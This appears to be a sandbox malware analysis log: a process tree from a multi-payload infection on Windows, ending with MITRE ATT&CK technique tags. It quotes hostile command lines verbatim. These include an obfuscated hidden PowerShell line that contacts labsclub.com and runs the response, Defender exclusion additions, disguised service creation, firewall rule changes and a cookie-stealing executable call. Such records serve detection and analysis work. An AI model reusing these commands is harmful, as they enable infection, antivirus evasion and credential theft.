- Delays execution with timeout.exe
PID:7868
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\zznote.exe" /Verysilent3⤵PID:7640
-
C:\Users\Admin\AppData\Local\Temp\is-CDA09.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-CDA09.tmp\zznote.tmp" /SL5="$80226,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\zznote.exe" /Verysilent4⤵PID:7660
-
C:\Users\Admin\AppData\Local\Temp\is-9MHVR.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-9MHVR.tmp\jg4_4jaa.exe" /silent5⤵PID:7948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\hjjgaa.exe" /Verysilent3⤵PID:4652
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:6392
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:8116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RUC1A.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-RUC1A.tmp\winlthst.exe" test1 test11⤵PID:5164
-
C:\Users\Admin\AppData\Local\Temp\Bl7929G0y.exe"C:\Users\Admin\AppData\Local\Temp\Bl7929G0y.exe"2⤵PID:3756
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Bl7929G0y.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Bl7929G0y.exe" & del C:\ProgramData\*.dll & exit3⤵PID:7256
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Bl7929G0y.exe /f4⤵
- Kills process with taskkill
PID:7524
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:5916
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"2⤵PID:5296
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:6836
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Shy-Morning"1⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\is-V8L7L.tmp\moyah0k4v2a.tmp"C:\Users\Admin\AppData\Local\Temp\is-V8L7L.tmp\moyah0k4v2a.tmp" /SL5="$30232,404973,58368,C:\Users\Admin\AppData\Roaming\uixypn1nshu\moyah0k4v2a.exe" /VERYSILENT /p=testparams1⤵PID:5860
-
C:\Program Files (x86)\JCleaner\8.exe"C:\Program Files (x86)\JCleaner\8.exe"1⤵PID:5032
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys2⤵PID:5236
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:5696
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"1⤵PID:4296
-
C:\Users\Admin\AppData\Local\Temp\is-I03FN.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-I03FN.tmp\IBInstaller_97039.tmp" /SL5="$303E0,14452723,721408,C:\Users\Admin\AppData\Local\Temp\aespuai3xt5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:2796
-
C:\Users\Admin\AppData\Local\Temp\is-SFUKC.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-SFUKC.tmp\chashepro3.tmp" /SL5="$10234,2015144,58368,C:\Users\Admin\AppData\Local\Temp\si5vnkqhco4\chashepro3.exe" /VERYSILENT1⤵PID:5024
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5344
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5372
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5368
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6416
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6960
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4884
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4788
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:5744
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4d3236e3-12c3-5147-875d-cd75be2bc02b}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6184
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:2212
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7616
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:7424
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6672
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4336
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7716
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:1236
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5268
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5516
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\cd42c6369c4241c9955d1c55e2f7c310 /t 0 /p 52681⤵PID:8168
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:5628
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7956
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2584
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5760
-
C:\Users\Admin\AppData\Local\Temp\1AD4.tmp.exeC:\Users\Admin\AppData\Local\Temp\1AD4.tmp.exe1⤵PID:7876
-
C:\Users\Admin\AppData\Local\Temp\30AE.tmp.exeC:\Users\Admin\AppData\Local\Temp\30AE.tmp.exe1⤵PID:4196
-
C:\Users\Admin\AppData\Local\Temp\30AE.tmp.exeC:\Users\Admin\AppData\Local\Temp\30AE.tmp.exe2⤵PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\3A54.tmp.exeC:\Users\Admin\AppData\Local\Temp\3A54.tmp.exe1⤵PID:4240
-
C:\Users\Admin\AppData\Local\Temp\3A54.tmp.exe"{path}"2⤵PID:9048
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\586C.tmp.exeC:\Users\Admin\AppData\Local\Temp\586C.tmp.exe1⤵PID:6412
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\586C.tmp.exe"2⤵PID:5444
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:640
-
-
-
C:\Users\Admin\AppData\Local\Temp\73A6.tmp.exeC:\Users\Admin\AppData\Local\Temp\73A6.tmp.exe1⤵PID:2776
-
C:\Users\Admin\AppData\Local\Temp\A17D.tmp.exeC:\Users\Admin\AppData\Local\Temp\A17D.tmp.exe1⤵PID:7460
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 12⤵PID:8344
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
PID:9084
-
-
-
C:\Users\Admin\AppData\Local\Temp\A17D.tmp.exe"C:\Users\Admin\AppData\Local\Temp\A17D.tmp.exe"2⤵PID:7172
-
-
C:\Users\Admin\AppData\Local\Temp\A17D.tmp.exe"C:\Users\Admin\AppData\Local\Temp\A17D.tmp.exe"2⤵PID:7992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 24762⤵
- Program crash
PID:8236
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1232
-
C:\Users\Admin\AppData\Local\Temp\BD15.tmp.exeC:\Users\Admin\AppData\Local\Temp\BD15.tmp.exe1⤵PID:5068
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6324
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7180
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2812
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7732
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6436
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7480
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2820
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7776
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3772
-
C:\Users\Admin\AppData\Local\Temp\9C5A.exeC:\Users\Admin\AppData\Local\Temp\9C5A.exe1⤵PID:9856
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo MFbR2⤵PID:9260
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html2⤵PID:9904
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:5504
-
-
-
C:\Users\Admin\AppData\Local\Temp\BA24.exeC:\Users\Admin\AppData\Local\Temp\BA24.exe1⤵PID:9404
-
C:\Users\Admin\AppData\Local\Temp\EE83.exeC:\Users\Admin\AppData\Local\Temp\EE83.exe1⤵PID:7016
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xyzcyvyk\2⤵PID:8600
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dcqsgdew.exe" C:\Windows\SysWOW64\xyzcyvyk\2⤵PID:9436
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create xyzcyvyk binPath= "C:\Windows\SysWOW64\xyzcyvyk\dcqsgdew.exe /d\"C:\Users\Admin\AppData\Local\Temp\EE83.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:5644
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description xyzcyvyk "wifi internet conection"2⤵PID:8548
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start xyzcyvyk2⤵PID:10364
-
-
C:\Users\Admin\boaxqdis.exe"C:\Users\Admin\boaxqdis.exe" /d"C:\Users\Admin\AppData\Local\Temp\EE83.exe"2⤵PID:10548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fhciboy.exe" C:\Windows\SysWOW64\xyzcyvyk\3⤵PID:8068
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config xyzcyvyk binPath= "C:\Windows\SysWOW64\xyzcyvyk\fhciboy.exe /d\"C:\Users\Admin\boaxqdis.exe\""3⤵PID:11144
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start xyzcyvyk3⤵PID:7160
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:10996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0280.bat" "3⤵PID:5400
-
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:10532
-
-
C:\Users\Admin\AppData\Local\Temp\A3A.exeC:\Users\Admin\AppData\Local\Temp\A3A.exe1⤵PID:8244
-
C:\Users\Admin\AppData\Local\Temp\11EC.exeC:\Users\Admin\AppData\Local\Temp\11EC.exe1⤵PID:8312
-
C:\Users\Admin\AppData\Local\Temp\11EC.exeC:\Users\Admin\AppData\Local\Temp\11EC.exe2⤵PID:10904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wandering-Frost"1⤵PID:11188
-
C:\Users\Admin\AppData\Local\Temp\30CF.exeC:\Users\Admin\AppData\Local\Temp\30CF.exe1⤵PID:10504
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:8108
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:9344
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9500
-
C:\Users\Admin\AppData\Local\Temp\8DA6.exeC:\Users\Admin\AppData\Local\Temp\8DA6.exe1⤵PID:10660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7892
-
C:\Users\Admin\AppData\Local\Temp\AC3B.exeC:\Users\Admin\AppData\Local\Temp\AC3B.exe1⤵PID:10468
-
C:\Users\Admin\AppData\Local\Temp\is-I83E1.tmp\AC3B.tmp"C:\Users\Admin\AppData\Local\Temp\is-I83E1.tmp\AC3B.tmp" /SL5="$3081C,442598,358912,C:\Users\Admin\AppData\Local\Temp\AC3B.exe"2⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\is-799RL.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-799RL.tmp\kkkk.exe" /S /UID=lab2123⤵PID:6212
-
-
-
C:\Users\Admin\AppData\Local\Temp\CAA1.exeC:\Users\Admin\AppData\Local\Temp\CAA1.exe1⤵PID:11048
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11252
-
C:\Users\Admin\AppData\Local\Temp\DE78.exeC:\Users\Admin\AppData\Local\Temp\DE78.exe1⤵PID:10764
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:9176
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Bootkit
1Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
1Defense Evasion
Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1